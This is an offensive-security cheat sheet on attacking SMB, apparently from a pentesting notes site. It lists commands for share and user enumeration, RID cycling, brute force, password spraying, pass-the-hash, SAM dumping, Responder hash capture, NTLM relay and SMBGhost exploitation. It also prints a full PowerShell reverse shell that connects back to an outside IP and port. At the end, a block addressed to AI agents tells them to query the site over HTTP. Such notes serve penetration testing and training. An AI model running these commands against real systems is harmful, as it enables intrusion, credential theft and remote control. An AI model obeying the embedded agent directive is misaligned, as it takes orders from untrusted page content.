# Pentesting SMB ## SMB Enumeration * The SMB is a network file sharing protocol that provides access to shared files and printers on a local network. * When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication. * SMB uses the following TCP and UDP ports: ``` Netbios-ns 137/tcp #NETBIOS Name Service Netbios-ns 137/udp netbios-dgm 138/tcp #NETBIOS Datagram Service Netbios-dgm 138/udp Netbios-ssn 139/tcp #NETBIOS session service Netbios-ssn 139/udp Microsoft-ds 445/tcp #if you are using active directory ``` ### SMB Checklist * Basic Commands * From SMB command line * View/Get Files ``` get services.txt more services.txt ``` * Enumerate Hostname ``` nmblookup -A $ip ``` * List Shares ``` smbmap -H $ip smbclient -L 10.129.101.197 -U Administrator nmap --script smb-enum-shares -p 139,445 $ip ``` If Samba is on a non-standard port, pass the port explicitly: ```bash smbmap -H $ip -P 36445 smbclient -U "" -L $ip -p 36445 nmap --script smb-enum-shares -p 36445 $ip ``` * Connect to a listed share ``` smbclient \\\\10.129.101.197\\C$ -U Administrator smbclient \\\\$ip\\[share name] ``` * Check Null Sessions ``` smbmap -u anonymous -H 10.10.115.116 smbmap -H $ip rpcclient -U "" -N $ip ``` * With authentication ``` smbmap -u svc-admin -p management2005 -H 10.10.248.93 ``` * Check for Vulnerabilities ``` nmap --script smb-vuln* -p 139,445 $ip ``` * Overall Scan ``` enum4linux -a $ip ``` * Get a shell with smbmap (windows) ``` smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' ``` * Brute Force SMB ``` medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv ``` ### smbmap * smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration. ``` smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig" ``` * `-s` -> specify the share to enumerate * `-d` -> specify the domain to enumerate * `--download` -> downloads a file * `--upload` -> uploads a file ### smbclient * List shares ``` smbclient -L 10.10.115.116 ``` * smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt. * `-w` -> specify the domain(workgroup) to use when connecting to the host * `-I` -> specify the ip address of the host * `-c "ipconfig"` -> would run the `ipconfig` command on the host * `-U` -> specify the username to authenticate with * `-P` -> specifies the password to authenticate with * `-N` -> tells smbclient to not use a password * `get test` -> would download the file named `test` * `put /etc/hosts` -> would put your `/etc/hosts` file on the target * Syntax: * To see which shares are available on a given host, run: ``` /usr/bin/smbclient -L 10.10.10.10 ``` * For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \10.10.10.10\public. - * However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this: ``` /usr/bin/smbclient \\\\10.10.10.10\\public mypasswd ``` * To authenticate with a null sessions ``` smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr' ``` * smbclient with domain credentials ``` smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1 ``` ### rpcclient * A tool used for executing client-side MS-RPC functions. A null session in a connection with a samba or SMB server that does not require authentication with a password. ``` rpcclient -U "" [target ip address] ``` * The -U option defines a null username, you will be asked for a password but leave it blank (hit enter!!!!) * The command line will change to the rpcclient context ``` rpcclient $> ``` * To retrieve some general information about the server like the domain and number of users: ``` querydominfo ``` * This command returns the domain, server, total users on the system and some other useful information. * Also shows the total number of user accounts and groups available on the target system. * To retrieve a list of users present on the system ``` enumdomusers ``` * The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information: ``` lookupsids #convert SIDs to names lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002 lookupnames #convert names to SIDs lookupnames Bill queryuser 0x47f #get the user rid form enomdomusers command queryusergroups 0x47b #use the rid for the username to see their group membership querygroup 0x47c #when you get the group membership back use those rids for this query ``` ``` enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24) ``` * Enumerate Privleges on the target box ``` getusername Account Name: Guest, Authority Name: RELEVANT ``` * Get username you are running as ``` queryuser [username] username=pbx queryuser pbx, queryuser 1000, queryuser 0x3e8 ``` -This command will return information about the profile path on the server, the home drive, password related settings and a lot more. * To see an overview of all enumeration objects just type enum+tabx2. * If you get an error that says: ``` Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED ``` * Occurs because the minimum protocol version for smbclient has been set to SMB2\_02 * Fix with: ``` sudo vim /etc/samba/smb.conf ``` * Add the following line to the config under the `[global]` section ``` client min protocol = CORE ``` * Alternative method to enumdomusers is through RID cycling. * To determine the full SID we can run the: ‘lookupnames’ command and search for the domain with the following command: ``` lookupnames pbx ``` * There are two sets of RIDS 500-1000 for system and 1000-10000 for Domain created users and groups. * If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username: ``` rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500 S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8) ``` * Shows SID is unknown, increase by one ``` rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501 S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1) ``` * Find a valid user, increase the RID to 1000. ``` rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000 S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1) ``` * Have the full SID now ### Manual RID Cycling Technique When `enumdomusers` fails, manually cycle through RIDs to find users: ```bash rpcclient -U hazard 10.129.96.157 # Enter password # First, get SID for a known user lookupnames hazard # hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1) # Now cycle through RIDs using the domain SID prefix # RID 500 = Administrator lookupsids S-1-5-21-4254423774-1266059056-3197185112-500 # S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1) # Continue incrementing through 1000+ for user-created accounts lookupsids S-1-5-21-4254423774-1266059056-3197185112-1000 lookupsids S-1-5-21-4254423774-1266059056-3197185112-1001 # ... continue ... lookupsids S-1-5-21-4254423774-1266059056-3197185112-1009 # S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1) lookupsids S-1-5-21-4254423774-1266059056-3197185112-1012 # S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1) ``` **Key RID ranges:** | RID | Description | | ------- | --------------------- | | 500 | Administrator | | 501 | Guest | | 502 | krbtgt (DCs only) | | 512-519 | Domain groups | | 1000+ | User-created accounts | **Tip:** Cycle through RIDs 500, 501, then 1000-1050 to find hidden users when other enumeration fails. ### lookupsid.py Username Enumeration * Impacket’s lookupsid.py performs bruteforcing of Windows SID’s to identify users/groups on the remote target. * You need to be able to connect to `IPC$` without authentication or with a known password and username ``` python3 lookupsid.py anonymous@10.10.11.35 | tee users.txt Password: Impacket v0.11.0 - Copyright 2023 Fortra [*] Brute forcing SIDs at 10.10.11.35 [*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: CICADA\Administrator (SidTypeUser) 501: CICADA\Guest (SidTypeUser) 502: CICADA\krbtgt (SidTypeUser) 512: CICADA\Domain Admins (SidTypeGroup) 513: CICADA\Domain Users (SidTypeGroup) 514: CICADA\Domain Guests (SidTypeGroup) 515: CICADA\Domain Computers (SidTypeGroup) 516: CICADA\Domain Controllers (SidTypeGroup) 517: CICADA\Cert Publishers (SidTypeAlias) 518: CICADA\Schema Admins (SidTypeGroup) 519: CICADA\Enterprise Admins (SidTypeGroup) 520: CICADA\Group Policy Creator Owners (SidTypeGroup) 521: CICADA\Read-only Domain Controllers (SidTypeGroup) 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) 525: CICADA\Protected Users (SidTypeGroup) 526: CICADA\Key Admins (SidTypeGroup) 527: CICADA\Enterprise Key Admins (SidTypeGroup) 553: CICADA\RAS and IAS Servers (SidTypeAlias) 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) 1000: CICADA\CICADA-DC$ (SidTypeUser) 1101: CICADA\DnsAdmins (SidTypeAlias) 1102: CICADA\DnsUpdateProxy (SidTypeGroup) 1103: CICADA\Groups (SidTypeGroup) 1104: CICADA\john.smoulder (SidTypeUser) 1105: CICADA\sarah.dantelia (SidTypeUser) 1106: CICADA\michael.wrightson (SidTypeUser) 1108: CICADA\david.orelious (SidTypeUser) 1109: CICADA\Dev Support (SidTypeGroup) 1601: CICADA\emily.oscars (SidTypeUser) ``` ### Enum4linux * Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts. ``` enum4linux [target ip] ``` -Will auto RID cycle * Part of autorecon! * Recommend to > output to a text file for reference (its alot) ### Nmap SMB scripts ``` ls -l /usr/share/nmap/scripts/smb* nmap --script=[scriptname] [target ip] ``` * For smb-os-discovery: ``` nmap -p 139,445 --script=smb-os-discovery [target ip] ``` * First scans the target for all known SMB vulnerabilities * Second to see if target is vulnerable to EternalBlue ``` nmap -p 139,445 --script=smb-vuln* [target ip] nmap -p 445 [target] --script=smb-vuln-ms17-010 ``` ### Finding the Password Policy * Various ways to find a box's password policy ``` netexec smb 10.10.10.161 --pass-pol netexec smb 10.10.10.161 --pass-pol -u '' -p '' enum4linux 10.10.10.161 ``` * The reason this will sometimes not work is because when you install a new domain now null sessions will be disabled * However when a domain was upgraded from Windows 2000/2003/2008 they kept this feature on in order to have backwards compatibility ### Impacket psexec command execution ``` psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir ``` ### Bruteforcing SMB * If bruteforcing smb, remember that hydra does not support smbv1 * If your target is non domain joined, ensure you have a `.\` in front of your username * `--ignore-pw-decoding` is required for rockyou.txt ``` nxc smb 10.129.42.254 -u '.\bob' -p pw.txt --share users --ignore-pw-decoding ``` *** ## Samba Configuration ### Config File * Config path: `/etc/samba/smb.conf` ``` cat /etc/samba/smb.conf | grep -v "#\|\;" ``` ### Restart Samba ``` sudo systemctl restart smbd ``` ### SMB Version History | SMB Version | Supported | Features | | ----------- | ----------------------------------- | ---------------------------------------------------------------------- | | CIFS | Windows NT 4.0 | Communication via NetBIOS interface | | SMB 1.0 | Windows 2000 | Direct connection via TCP | | SMB 2.0 | Windows Vista, Windows Server 2008 | Performance upgrades, improved message signing, caching feature | | SMB 2.1 | Windows 7, Windows Server 2008 R2 | Locking mechanisms | | SMB 3.0 | Windows 8, Windows Server 2012 | Multichannel connections, end-to-end encryption, remote storage access | | SMB 3.0.2 | Windows 8.1, Windows Server 2012 R2 | | | SMB 3.1.1 | Windows 10, Windows Server 2016 | Integrity checking, AES-128 encryption | ### Dangerous Samba Settings | Setting | Description | | ------------------------- | --------------------------- | | browseable = yes | Allow listing shares | | read only = no | Allow file modification | | writable = yes | Allow creation/modification | | guest ok = yes | No password required | | enable privileges = yes | Honor SID-based privileges | | create mask = 0777 | World-writable new files | | directory mask = 0777 | World-writable new dirs | | logon script = script.sh | Script on login | | magic script = script.sh | Script on file close | | magic output = script.out | Magic script output file | ### RPCclient Commands Reference | Command | Description | | ------------------------ | ------------------------------ | | srvinfo | Server information | | enumdomains | Enumerate all domains | | querydominfo | Domain, server, user count | | netshareenumall | Enumerate all available shares | | netsharegetinfo \ | Share info by name | | enumdomusers | Enumerate domain users | | queryuser \ | User info by RID | | querygroup \ | Group info by RID | ### RID Brute Force (Bash Loop) ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` ### Impacket samrdump.py ``` samrdump.py 10.129.14.128 ``` ### Samba Status (Server-side) ``` smbstatus ``` *** ## SMB Share Interaction ### Windows CMD ``` C:\htb> net use n: \\192.168.220.129\Finance C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123 ``` List directory, count files, search filenames for creds/secrets, and search inside files: ``` C:\htb> dir \\192.168.220.129\Finance\ C:\htb> dir n: /a-d /s /b | find /c ":\" C:\htb> dir n:\*cred* /s /b C:\htb> dir n:\*secret* /s /b C:\htb> findstr /s /i cred n:\*.* ``` ### Windows PowerShell ```powershell Get-ChildItem \\192.168.220.129\Finance\ ``` Map drive: ```powershell New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" ``` Map drive with credentials: ```powershell $username = 'plaintext' $password = 'Password123' $secpassword = ConvertTo-SecureString $password -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred ``` Search files: ```powershell (Get-ChildItem -File -Recurse | Measure-Object).Count Get-ChildItem -Recurse -Path N:\ -Include *cred* -File Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List ``` ### Linux Mount ```bash sudo mkdir /mnt/Finance sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance ``` Mount with credential file: ```bash mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile ``` Credential file format: ``` username=plaintext password=Password123 domain=. ``` Search mounted shares: ```bash find /mnt/Finance/ -name *cred* grep -rn /mnt/Finance/ -ie cred ``` *** ## smbmap Advanced Usage Browse directory contents: ```bash smbmap -H 10.129.14.128 -r notes ``` Download file: ```bash smbmap -H 10.129.14.128 --download "notes\note.txt" ``` Upload file: ```bash smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" ``` *** ## NetExec Advanced Usage ### Password Spraying ```bash netexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth ``` * `--continue-on-success` — keep spraying after a valid hit * `--local-auth` — for non-domain joined machines ### Remote Command Execution ```bash netexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec ``` * `-x` — execute cmd commands * `-X` — execute PowerShell commands * `--exec-method` — smbexec, mmcexec, atexec, wmiexec ### Enumerate Logged-on Users ```bash netexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users ``` ### Extract SAM Hashes ```bash netexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam ``` ### Pass-the-Hash ```bash netexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE ``` *** ## Impacket PsExec ```bash impacket-psexec administrator:'Password123!'@10.10.110.17 ``` *** ## Responder — LLMNR/NBT-NS Hash Capture Responder poisons LLMNR, NBT-NS, and MDNS responses on the local network to capture NTLMv2 hashes when a victim makes a request to a nonexistent share or host. ```bash sudo responder -I ens33 ``` Captured hashes stored in `/usr/share/responder/logs/`. Crack NTLMv2 hash with Hashcat (module 5600): ```bash hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt ``` *** ## NTLM Relay Relay captured NTLM authentication to a different host instead of cracking. Requires SMB signing disabled on the target. Disable SMB in Responder config: ```bash cat /etc/responder/Responder.conf | grep 'SMB =' # SMB = Off ``` Relay to dump SAM: ```bash impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 ``` Relay with reverse shell command: ```bash impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e ' ``` Catch shell: ```bash nc -lvnp 9001 ``` Use `impacket-smbserver` to create a fake SMB share and capture hashes: ```bash sudo impacket-smbserver share ./ -smb2support ``` *** ## Authenticated SMB File Server (for Transfers) When guest access is blocked, use an authenticated smbserver: ```bash sudo impacket-smbserver -username "admin" -password "password123" -smb2support share /tmp/share ``` Map the share from PowerShell on the target: ```powershell $cred = New-Object System.Management.Automation.PSCredential ("admin", (ConvertTo-SecureString "password123" -AsPlainText -Force)) New-PSDrive -Name "TempShare" -PSProvider FileSystem -Root "\\\share" -Credential $cred -Persist:$false # Copy files Copy-Item -Path "file.txt" -Destination "TempShare:\" -Force # Remove drive when done Remove-PSDrive -Name "TempShare" ``` *** ## SMBGhost (CVE-2020-0796) * Affects SMBv3.1.1 compression in Windows 10 versions 1903 and 1909 * Integer overflow vulnerability leading to remote code execution * No authentication required * PoC: * If you already have a Meterpreter session, Metasploit's local module can escalate vulnerable Windows 10 v1903/v1909 x64 targets to SYSTEM: ``` exploit/windows/local/cve_2020_0796_smbghost ``` ``` set SESSION set TARGET 0 set PAYLOAD windows/x64/meterpreter/reverse_tcp run ``` Successful output includes: ``` The target appears to be vulnerable. Meterpreter session opened Server username: NT AUTHORITY\SYSTEM ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.